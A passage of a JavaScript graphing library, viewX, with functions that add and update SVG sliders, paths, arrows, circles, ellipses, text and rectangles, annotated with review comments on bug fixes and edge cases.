    // holderDiv stays an implicit global, matching the file-wide style.
    holderDiv = document.getElementById(holderName)
    holderDiv.appendChild(sliderinputElement);
    sliderinputElement.style.width = slideroptions.w;
    sliderinputElement.style.height = slideroptions.h;
    sliderinputElement.style.backgroundColor = slideroptions.sliderbasecolor
    viewX.sliderDivData[slidername] = [holderDiv, slidername, slideroptions]
    return [slidername, holderDiv]
}
viewX.divSlider = function(holder, divslidername, minval, maxval, currvalue, stepval, eventfunc, widthval, heightval, sliderTrackColor, thumbSize, thumbColor) {
    // Convenience wrapper around viewX.addSliderToDiv: builds the options
    // object from positional arguments and injects a per-slider <style>
    // block that themes the range thumb (size, round shape, color).
    // NOTE: 'options' is an implicit global (no var), as elsewhere in this file.
    options = {}
    options.min = minval
    options.max = maxval
    options.value = currvalue
    options.step = stepval
    options.eventFunction = eventfunc
    options.w = widthval
    options.h = heightval
    options.sliderbasecolor = sliderTrackColor
    // options.classname = sliderClass
    // Bug fix: Firefox's range-thumb pseudo-element is ::-moz-range-thumb;
    // the previous ::-moz-slider-thumb does not exist, so the Firefox rule
    // never applied.
    $('<style>#' + divslidername + '::-webkit-slider-thumb {-webkit-appearance: none; appearance: none;width: ' + thumbSize + ';height: ' + thumbSize + ';border-radius: 50%; background: ' + thumbColor + ';cursor: pointer; } #' + divslidername + '::-moz-range-thumb {appearance: none;width: ' + thumbSize + ';height: ' + thumbSize + ';border-radius: 50%; background: ' + thumbColor + ';cursor: pointer; }</style>').appendTo('head');
    viewX.addSliderToDiv(holder, divslidername, options)
}
viewX.addPath = function(graphname, pathname, pathoptions) {
    // Draw a polyline through pathoptions.points (graph coordinates) as an
    // SVG <path> on graph 'graphname'. Options: points (default
    // [[0,1],[1,0]]), strokewidth (percent units), pathcolor, pathfillcolor.
    // Registers the element in graphData[graphname].pathData[pathname] and
    // returns [pathElement, pathoptions] (undefined if drawing failed).
    // NOTE: gdata/aratio/pathstring/pth are implicit globals, matching the
    // rest of this file.
    gdata = viewX.graphData[graphname]
    pathoptions = pathoptions || {}
    aratio = gdata.aspectratio
    pathoptions.points = pathoptions.points || [[0, 1], [1, 0]]
    // Build the SVG path data: 'M x y' for the first point, 'L x y' after.
    pathstring = 'M'
    for (pth = 0; pth < pathoptions.points.length; pth++) {
        if (pth == 0) {
            pathstring = pathstring + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
        }
        else {
            pathstring = pathstring + 'L' + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
        }
    }
    pathoptions.name = pathname || viewX.uid
    pathoptions.strokewidth = pathoptions.strokewidth || 1
    pathoptions.pathcolor = pathoptions.pathcolor || 'hsla(190, 100%, 50%, 1)'
    pathoptions.pathfillcolor = pathoptions.pathfillcolor || 'none'
    var pathElement = document.createElementNS("http://www.w3.org/2000/svg", 'path');
    try {
        pathElement.setAttribute('d', pathstring);
        pathElement.setAttribute('id', graphname + '-path-' + pathname)
        viewX.uid = viewX.uid + 1
        pathElement.style.stroke = pathoptions.pathcolor
        pathElement.style.fill = pathoptions.pathfillcolor;
        pathElement.style.strokeWidth = pathoptions.strokewidth + '%';
        gdata.svgElement.appendChild(pathElement);
        viewX.graphData[graphname].pathData[pathname] = [pathElement, pathoptions]
        return [pathElement, pathoptions]
    }
    catch (err){
        // Bug fix: the message previously read "Could plot path points."
        console.log("Could not plot path points.", pathoptions.points)
    }
}
viewX.addArrow = function(graphname, arrowname, arrowoptions) {
    // Draw an arrow (shaft plus two-stroke head) from arrowoptions.from to
    // arrowoptions.to (graph coordinates) as a single SVG <path>.
    // Options: from (default [0,0]), to (default [1,1]), strokewidth
    // (default 0.4, percent units), arrowcolor. Registers the element in
    // graphData[graphname].arrowData[arrowname] and returns
    // [arrowElement, arrowoptions] (undefined if drawing failed).
    gdata = viewX.graphData[graphname]
    arrowoptions = arrowoptions || {}
    aratio = gdata.aspectratio
    arrowoptions.strokewidth = arrowoptions.strokewidth || 0.4
    arrowoptions.from = arrowoptions.from || [0, 0];
    arrowoptions.to = arrowoptions.to || [1, 1];
    // Shaft endpoints in scaled (percent) coordinates.
    arrowFrom = [viewX.graphToScaledX(arrowoptions.from[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.from[1], gdata.ymin, gdata.ymax, aratio)]
    arrowTo = [viewX.graphToScaledX(arrowoptions.to[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.to[1], gdata.ymin, gdata.ymax, aratio)]
    arrowstring = 'M'
    arrowstring = arrowstring + arrowFrom[0] + ' ' + arrowFrom[1] + ' ';
    arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
    // Arrow head: two short strokes at -35 and +35 degrees off the shaft
    // direction, each drawn back toward the tip.
    arrowDirectionVector = viewX.directionVec(arrowTo, arrowFrom);
    arrowHeadSize = Math.max(3*arrowoptions.strokewidth, 2);
    arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, -35);
    arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
    arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
    arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
    arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
    arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, 35);
    arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
    arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
    arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
    arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
    arrowoptions.name = arrowname || viewX.uid;
    arrowoptions.arrowcolor = arrowoptions.arrowcolor || 'hsla(0, 0%, 0%, 1)';
    var arrowElement = document.createElementNS("http://www.w3.org/2000/svg", 'path');
    try {
        arrowElement.setAttribute('d', arrowstring);
        arrowElement.setAttribute('id', graphname + '-arrow-' + arrowname);
        viewX.uid = viewX.uid + 1;
        arrowElement.style.stroke = arrowoptions.arrowcolor;
        arrowElement.style.fill = 'none';
        arrowElement.style.strokeWidth = arrowoptions.strokewidth + '%';
        gdata.svgElement.appendChild(arrowElement);
        viewX.graphData[graphname].arrowData[arrowname] = [arrowElement, arrowoptions]
        return [arrowElement, arrowoptions]
    }
    catch (err){
        // Bug fix: previously logged "Could plot arrow points." with
        // arrowoptions.points, a property arrows never set (always
        // undefined). Log the actual endpoints instead.
        console.log("Could not plot arrow.", arrowoptions.from, arrowoptions.to)
    }
}
viewX.updateArrow = function(graphname, arrowname, newarrowoptions) {
    // Recompute and redraw an existing arrow. Any of from/to/strokewidth/
    // arrowcolor may be supplied in newarrowoptions; omitted values keep
    // their previous settings. Geometry mirrors viewX.addArrow.
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio;
    arrowoptions = gdata.arrowData[arrowname][1]
    arrowElement = gdata.arrowData[arrowname][0]
    // NOTE(review): 'points' appears copied from the path code; arrows are
    // defined by from/to and nothing below reads points — presumably dead.
    arrowoptions.points = newarrowoptions.points || arrowoptions.points
    arrowoptions.strokewidth = newarrowoptions.strokewidth || arrowoptions.strokewidth
    arrowoptions.from = newarrowoptions.from || arrowoptions.from;
    arrowoptions.to = newarrowoptions.to || arrowoptions.to;
    // Shaft endpoints in scaled (percent) coordinates.
    arrowFrom = [viewX.graphToScaledX(arrowoptions.from[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.from[1], gdata.ymin, gdata.ymax, aratio)]
    arrowTo = [viewX.graphToScaledX(arrowoptions.to[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.to[1], gdata.ymin, gdata.ymax, aratio)]
    arrowstring = 'M'
    arrowstring = arrowstring + arrowFrom[0] + ' ' + arrowFrom[1] + ' ';
    arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
    // Arrow head: two short strokes at -35 and +35 degrees off the shaft.
    arrowDirectionVector = viewX.directionVec(arrowTo, arrowFrom);
    arrowHeadSize = Math.max(3*arrowoptions.strokewidth, 2);
    arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, -35);
    arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
    arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
    arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
    arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
    arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, 35);
    arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
    arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
    arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
    arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
    try {
        arrowElement.setAttribute('d', arrowstring);
        arrowoptions.arrowcolor = newarrowoptions.arrowcolor || arrowoptions.arrowcolor
        arrowElement.style.stroke = arrowoptions.arrowcolor
        arrowElement.style.fill = 'none'
        arrowElement.style.strokeWidth = arrowoptions.strokewidth + '%';
        viewX.graphData[graphname].arrowData[arrowname] = [arrowElement, arrowoptions]
    }
    catch (err){
        console.log("Arrow points Error", newarrowoptions.points)
    }
}
viewX.updatePath = function(graphname, pathname, newpathoptions) {
    // Rebuild an existing path's 'd' data and styling. Any of points/
    // strokewidth/pathcolor/pathfillcolor may be supplied in newpathoptions;
    // omitted values keep their previous settings.
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    pathoptions = gdata.pathData[pathname][1]
    pathElement = gdata.pathData[pathname][0]
    pathoptions.points = newpathoptions.points || pathoptions.points
    // Rebuild the SVG path data: 'M x y' for the first point, 'L x y' after.
    pathstring = 'M'
    for (pth = 0; pth < pathoptions.points.length; pth++) {
        if (pth == 0) {
            pathstring = pathstring + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
        }
        else {
            pathstring = pathstring + 'L' + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
        }
    }
    try {
        pathElement.setAttribute('d', pathstring);
        pathoptions.strokewidth = newpathoptions.strokewidth || pathoptions.strokewidth
        pathoptions.pathcolor = newpathoptions.pathcolor || pathoptions.pathcolor
        pathoptions.pathfillcolor = newpathoptions.pathfillcolor || pathoptions.pathfillcolor
        pathElement.style.stroke = pathoptions.pathcolor
        pathElement.style.fill = pathoptions.pathfillcolor
        pathElement.style.strokeWidth = pathoptions.strokewidth + '%';
        viewX.graphData[graphname].pathData[pathname] = [pathElement, pathoptions]
    }
    catch (err){
        console.log("Path points Error", newpathoptions.points)
    }
}
viewX.updatePathPoints = function(graphname, pathname, npathpoints) {
    // Fast path update: replace only the point list of an existing path,
    // leaving colors and stroke width untouched.
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    pathoptions = gdata.pathData[pathname][1]
    pathElement = gdata.pathData[pathname][0]
    // NOTE(review): an empty array [] is truthy, so it replaces the old
    // points; the length guard below then skips the redraw and the element
    // keeps its previous 'd' — presumably intentional, confirm.
    pathoptions.points = npathpoints || pathoptions.points
    if (pathoptions.points.length > 0) {
        pathstring = 'M'
        for (pth = 0; pth < pathoptions.points.length; pth++) {
            if (pth == 0) {
                pathstring = pathstring + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
            }
            else {
                pathstring = pathstring + 'L' + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
            }
        }
        try {
            pathElement.setAttribute('d', pathstring);
            viewX.graphData[graphname].pathData[pathname] = [pathElement, pathoptions]
            return [pathElement, pathoptions]
        }
        catch (err){
            console.log(npathpoints)
        }
    }
}
viewX.distanceBTWgraphToSvg = function(p1, p2, xmin, xmax, ymin, ymax, aspectratio) {
    // Map two graph-space points into scaled SVG (percent) space and return
    // the Euclidean distance between them.
    // pt1/pt2 stay implicit globals for compatibility with the rest of the file.
    pt1 = [viewX.graphToScaledX(p1[0], xmin, xmax, aspectratio), viewX.graphToScaledY(p1[1], ymin, ymax, aspectratio)]
    pt2 = [viewX.graphToScaledX(p2[0], xmin, xmax, aspectratio), viewX.graphToScaledY(p2[1], ymin, ymax, aspectratio)]
    var dx = pt1[0] - pt2[0]
    var dy = pt1[1] - pt2[1]
    return Math.pow(dx*dx + dy*dy, 0.5)
}
viewX.addCircle = function(graphname, circlename, circleoptions) {
    // Draw a circle (rendered as an SVG <ellipse>, since x and y scale
    // differently) at graph coordinates (x, y) with the given radius.
    // Defaults: x=0.3, y=0.3, radius=0.3 — the != 0 checks let callers pass
    // an explicit 0 without it being clobbered by the || default.
    // Returns [circleElement, circleoptions].
    gdata = viewX.graphData[graphname]
    circleoptions = circleoptions || {}
    aratio = gdata.aspectratio
    if (circleoptions.x != 0) {
        circleoptions.x = circleoptions.x || 0.3
    }
    else {
        circleoptions.x = 0
    }
    if (circleoptions.y != 0) {
        circleoptions.y = circleoptions.y || 0.3
    }
    else {
        circleoptions.y = 0
    }
    if (circleoptions.radius != 0) {
        circleoptions.radius = circleoptions.radius || 0.3
    }
    else {
        circleoptions.radius = 0
    }
    circleoptions.name = circlename || viewX.uid
    circleoptions.stroke = circleoptions.stroke || 'hsla(190, 100%, 50%, 0.5)'
    circleoptions.strokewidth = circleoptions.strokewidth || 0.1
    circleoptions.circlecolor = circleoptions.circlecolor || 'hsla(190, 100%, 50%, 1)'
    // Convert the graph-space radius to percent units along each axis.
    rx = viewX.distanceBTWgraphToSvg([0,0],[circleoptions.radius, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    ry = viewX.distanceBTWgraphToSvg([0,0],[0, circleoptions.radius], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    var circleElement = document.createElementNS("http://www.w3.org/2000/svg", 'ellipse');
    circleElement.setAttribute('cx', viewX.graphToScaledX(circleoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    circleElement.setAttribute('cy', viewX.graphToScaledY(circleoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    circleElement.setAttribute('rx', rx + '%')
    circleElement.setAttribute('ry', ry + '%');
    circleElement.setAttribute('id', graphname + '-circle-' + circlename)
    viewX.uid = viewX.uid + 1
    circleElement.setAttribute('vector-effect','non-scaling-stroke');
    circleElement.style.fill = circleoptions.circlecolor
    circleElement.style.strokeWidth = circleoptions.strokewidth + '%';
    circleElement.style.stroke = circleoptions.stroke;
    circleElement.setAttribute('stroke-dasharray', circleoptions.strokedasharray);
    gdata.svgElement.appendChild(circleElement);
    viewX.graphData[graphname].circleData[circlename] = [circleElement, circleoptions]
    return [circleElement, circleoptions]
}
viewX.updateCircle = function(graphname, circlename, circlenewvalues) {
    // Update position, radius and styling of an existing circle.
    // NOTE(review): when a stored value is 0 the else-branch assigns the new
    // value unconditionally — if the caller omitted it, the option becomes
    // undefined. Confirm callers always pass x/y/radius when the old value is 0.
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    circleoptions = gdata.circleData[circlename][1]
    circleElement = gdata.circleData[circlename][0]
    if (circleoptions.x != 0) {
        circleoptions.x = circlenewvalues.x || circleoptions.x
    }
    else {
        circleoptions.x = circlenewvalues.x
    }
    if (circleoptions.y != 0) {
        circleoptions.y = circlenewvalues.y || circleoptions.y
    }
    else {
        circleoptions.y = circlenewvalues.y
    }
    if (circleoptions.radius != 0) {
        circleoptions.radius = circlenewvalues.radius || circleoptions.radius
    }
    else {
        circleoptions.radius = circlenewvalues.radius
    }
    circleoptions.name = circlename || viewX.uid
    circleoptions.stroke = circlenewvalues.stroke || circleoptions.stroke
    circleoptions.strokewidth = circlenewvalues.strokewidth || circleoptions.strokewidth
    circleoptions.circlecolor = circlenewvalues.circlecolor || circleoptions.circlecolor
    // Convert the graph-space radius to percent units along each axis.
    rx = viewX.distanceBTWgraphToSvg([0,0],[circleoptions.radius, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    ry = viewX.distanceBTWgraphToSvg([0,0],[0, circleoptions.radius], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    circleElement.setAttribute('cx', viewX.graphToScaledX(circleoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    circleElement.setAttribute('cy', viewX.graphToScaledY(circleoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    circleElement.setAttribute('rx', rx + '%')
    circleElement.setAttribute('ry', ry + '%');
    circleElement.setAttribute('id', graphname + '-circle-' + circlename)
    viewX.uid = viewX.uid + 1
    circleElement.setAttribute('vector-effect','non-scaling-stroke');
    circleElement.style.fill = circleoptions.circlecolor
    circleElement.style.strokeWidth = circleoptions.strokewidth + '%';
    circleElement.style.stroke = circleoptions.stroke;
    circleElement.setAttribute('stroke-dasharray', circleoptions.strokedasharray);
    viewX.graphData[graphname].circleData[circlename] = [circleElement, circleoptions]
}
viewX.addEllipse = function(graphname, ellipsename, ellipseoptions) {
    // Draw an SVG <ellipse> centered at graph coordinates (x, y) with
    // graph-space radii rx/ry. Returns [ellipseElement, ellipseoptions].
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    ellipseoptions = ellipseoptions || {}
    // Bug fix: the previous parseFloat(opts.x.toString() || 0) threw a
    // TypeError whenever an option was missing ('.toString()' on undefined).
    // Apply the intended default first, then normalize to a number.
    ellipseoptions.x = parseFloat((ellipseoptions.x != null ? ellipseoptions.x : 0).toString())
    ellipseoptions.y = parseFloat((ellipseoptions.y != null ? ellipseoptions.y : 0).toString())
    ellipseoptions.rx = parseFloat((ellipseoptions.rx != null ? ellipseoptions.rx : 0.3).toString())
    ellipseoptions.ry = parseFloat((ellipseoptions.ry != null ? ellipseoptions.ry : 8).toString())
    ellipseoptions.name = ellipsename || viewX.uid
    ellipseoptions.stroke = ellipseoptions.stroke || 'hsla(190, 100%, 50%, 0.5)'
    ellipseoptions.strokewidth = ellipseoptions.strokewidth || 0.1
    ellipseoptions.ellipsecolor = ellipseoptions.ellipsecolor || 'hsla(190, 100%, 50%, 1)'
    // Convert graph-space radii to percent units along each axis.
    rx = viewX.distanceBTWgraphToSvg([0,0],[ellipseoptions.rx, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    ry = viewX.distanceBTWgraphToSvg([0,0],[0, ellipseoptions.ry], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    var ellipseElement = document.createElementNS("http://www.w3.org/2000/svg", 'ellipse');
    ellipseElement.setAttribute('cx', viewX.graphToScaledX(ellipseoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    ellipseElement.setAttribute('cy', viewX.graphToScaledY(ellipseoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    ellipseElement.setAttribute('rx', rx + '%')
    ellipseElement.setAttribute('ry', ry + '%');
    ellipseElement.setAttribute('id', graphname + '-ellipse-' + ellipsename)
    viewX.uid = viewX.uid + 1
    ellipseElement.setAttribute('vector-effect','non-scaling-stroke');
    ellipseElement.style.fill = ellipseoptions.ellipsecolor
    ellipseElement.style.strokeWidth = ellipseoptions.strokewidth + '%';
    ellipseElement.style.stroke = ellipseoptions.stroke;
    gdata.svgElement.appendChild(ellipseElement);
    viewX.graphData[graphname].ellipseData[ellipsename] = [ellipseElement, ellipseoptions]
    return [ellipseElement, ellipseoptions]
}
viewX.updateEllipse = function(graphname, ellipsename, ellipsenewvalues) {
    // Update position, radii and styling of an existing ellipse.
    // NOTE(review): unlike updateCircle, the else-branches pin a stored 0 to
    // 0 forever — once x/y/rx/ry is 0, new values are ignored. Confirm this
    // is intended before relying on it.
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    ellipseoptions = gdata.ellipseData[ellipsename][1]
    ellipseElement = gdata.ellipseData[ellipsename][0]
    if (ellipseoptions.x != 0) {
        ellipseoptions.x = ellipsenewvalues.x || ellipseoptions.x
    }
    else {
        ellipseoptions.x = 0
    }
    if (ellipseoptions.y != 0) {
        ellipseoptions.y = ellipsenewvalues.y || ellipseoptions.y
    }
    else {
        ellipseoptions.y = 0
    }
    if (ellipseoptions.rx != 0) {
        ellipseoptions.rx = ellipsenewvalues.rx || ellipseoptions.rx
    }
    else {
        ellipseoptions.rx = 0
    }
    if (ellipseoptions.ry != 0) {
        ellipseoptions.ry = ellipsenewvalues.ry || ellipseoptions.ry
    }
    else {
        ellipseoptions.ry = 0
    }
    ellipseoptions.name = ellipsename || viewX.uid
    ellipseoptions.stroke = ellipsenewvalues.stroke || ellipseoptions.stroke
    ellipseoptions.strokewidth = ellipsenewvalues.strokewidth || ellipseoptions.strokewidth
    ellipseoptions.ellipsecolor = ellipsenewvalues.ellipsecolor || ellipseoptions.ellipsecolor
    // Convert graph-space radii to percent units along each axis.
    rx = viewX.distanceBTWgraphToSvg([0,0],[ellipseoptions.rx, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    ry = viewX.distanceBTWgraphToSvg([0,0],[0, ellipseoptions.ry], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    ellipseElement.setAttribute('cx', viewX.graphToScaledX(ellipseoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    ellipseElement.setAttribute('cy', viewX.graphToScaledY(ellipseoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    ellipseElement.setAttribute('rx', rx + '%')
    ellipseElement.setAttribute('ry', ry + '%');
    ellipseElement.setAttribute('id', graphname + '-ellipse-' + ellipsename)
    viewX.uid = viewX.uid + 1
    ellipseElement.setAttribute('vector-effect','non-scaling-stroke');
    ellipseElement.style.fill = ellipseoptions.ellipsecolor
    ellipseElement.style.strokeWidth = ellipseoptions.strokewidth + '%';
    ellipseElement.style.stroke = ellipseoptions.stroke;
    // appendChild on an already-attached node just moves it to the end
    // (raises it above later siblings); no duplicate is created.
    gdata.svgElement.appendChild(ellipseElement);
    viewX.graphData[graphname].ellipseData[ellipsename] = [ellipseElement, ellipseoptions]
}
viewX.addText = function(graphname, textname, textoptions) {
    // Place an SVG <text> element at graph coordinates (x, y).
    // Options: text, textAlign ('left' default, 'center' maps to
    // text-anchor="middle"), fontSize, fontFamily, textcolor.
    // Returns [textElement, textoptions].
    gdata = viewX.graphData[graphname]
    textoptions = textoptions || {}
    aratio = gdata.aspectratio
    // Bug fix: the previous parseFloat(opts.x.toString() || 0) threw a
    // TypeError when x or y was omitted. Default first, then normalize.
    textoptions.x = parseFloat((textoptions.x != null ? textoptions.x : 0).toString())
    textoptions.y = parseFloat((textoptions.y != null ? textoptions.y : 0).toString())
    textoptions.text = textoptions.text || ''
    textoptions.name = textname || viewX.uid
    textoptions.textAlign = textoptions.textAlign || 'left'
    textoptions.fontSize = textoptions.fontSize || 12
    textoptions.fontFamily = textoptions.fontFamily || 'Source Sans Pro'
    textoptions.textcolor = textoptions.textcolor || 'hsla(190, 100%, 0%, 1)'
    var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
    textElement.setAttribute('x', viewX.graphToScaledX(textoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    textElement.setAttribute('y', viewX.graphToScaledY(textoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    textElement.setAttribute('id', graphname + '-text-' + textname)
    viewX.uid = viewX.uid + 1
    textElement.setAttribute('vector-effect','non-scaling-stroke');
    textElement.style.fill = textoptions.textcolor
    textElement.innerHTML = textoptions.text
    textElement.style.fontFamily = textoptions.fontFamily
    textElement.style.fontSize = textoptions.fontSize;
    if (textoptions.textAlign == 'center') {
        textElement.setAttribute('text-anchor','middle')
    }
    gdata.svgElement.appendChild(textElement);
    viewX.graphData[graphname].textData[textname] = [textElement, textoptions]
    return [textElement, textoptions]
}
viewX.updateText = function(graphname, textname, textvalues) {
    // Update an existing text element's content, position, color and size.
    // Omitted fields keep their previous values (note: || means an explicit
    // 0 or '' in textvalues is treated as "not supplied").
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    textoptions = gdata.textData[textname][1]
    textElement = gdata.textData[textname][0]
    textoptions.text = textvalues.text || textoptions.text
    textoptions.x = textvalues.x || textoptions.x
    textoptions.y = textvalues.y || textoptions.y
    textoptions.textcolor = textvalues.textcolor || textoptions.textcolor
    textoptions.fontSize = textvalues.fontSize || textoptions.fontSize
    textElement.innerHTML = textoptions.text
    textElement.setAttribute('x', viewX.graphToScaledX(textoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    textElement.setAttribute('y', viewX.graphToScaledY(textoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    textElement.style.fill = textoptions.textcolor
    textElement.style.fontSize = textoptions.fontSize;
    viewX.graphData[graphname].textData[textname] = [textElement, textoptions]
    return [textElement, textoptions]
}
viewX.addRectangle = function(graphname, rectname, rectoptions) {
    // Draw an SVG <rect> with its x/y anchor at graph coordinates (x, y)
    // and graph-space width w / height h. Returns [rectElement, rectoptions].
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    rectoptions = rectoptions || {}
    // Bug fix: the previous parseFloat(opts.x.toString() || 0) threw a
    // TypeError whenever an option was missing. Default first, then
    // normalize to a number.
    rectoptions.x = parseFloat((rectoptions.x != null ? rectoptions.x : 0).toString())
    rectoptions.y = parseFloat((rectoptions.y != null ? rectoptions.y : 0).toString())
    rectoptions.w = parseFloat((rectoptions.w != null ? rectoptions.w : 1).toString())
    rectoptions.h = parseFloat((rectoptions.h != null ? rectoptions.h : 1).toString())
    rectoptions.name = rectname || viewX.uid
    rectoptions.stroke = rectoptions.stroke || 'hsla(190, 100%, 50%, 0.5)'
    rectoptions.strokewidth = rectoptions.strokewidth || 0.1
    rectoptions.strokedasharray = rectoptions.strokedasharray || ""
    rectoptions.rectcolor = rectoptions.rectcolor || 'hsla(190, 100%, 50%, 1)'
    // Convert graph-space width/height to percent units along each axis.
    rx = viewX.distanceBTWgraphToSvg([0,0],[rectoptions.w, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    ry = viewX.distanceBTWgraphToSvg([0,0],[0, rectoptions.h], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    var rectElement = document.createElementNS("http://www.w3.org/2000/svg", 'rect');
    rectElement.setAttribute('x', viewX.graphToScaledX(rectoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
    rectElement.setAttribute('y', viewX.graphToScaledY(rectoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
    rectElement.setAttribute('width', rx + '%')
    rectElement.setAttribute('height', ry + '%');
    rectElement.setAttribute('id', graphname + '-rect-' + rectname)
    viewX.uid = viewX.uid + 1
    rectElement.setAttribute('vector-effect','non-scaling-stroke');
    rectElement.style.fill = rectoptions.rectcolor
    rectElement.style.strokeWidth = rectoptions.strokewidth + '%';
    rectElement.style.stroke = rectoptions.stroke;
    rectElement.setAttribute('stroke-dasharray', rectoptions.strokedasharray);
    gdata.svgElement.appendChild(rectElement);
    viewX.graphData[graphname].rectData[rectname] = [rectElement, rectoptions]
    return [rectElement, rectoptions]
}
viewX.updateRectangle = function(graphname, rectname, rectvalueupdate) {
    // Update an existing rectangle's position, size and styling.
    // The != 0 checks here are on the NEW values (unlike updateCircle):
    // an explicit 0 is assigned directly, an omitted field (undefined != 0)
    // falls through to 'new || old' and keeps the previous value.
    gdata = viewX.graphData[graphname]
    rectoptions = gdata.rectData[rectname][1]
    rectElement = gdata.rectData[rectname][0]
    aratio = gdata.aspectratio
    if (rectvalueupdate.x != 0) {
        rectoptions.x = rectvalueupdate.x || rectoptions.x
    }
    else {
        rectoptions.x = rectvalueupdate.x
    }
    if (rectvalueupdate.y != 0) {
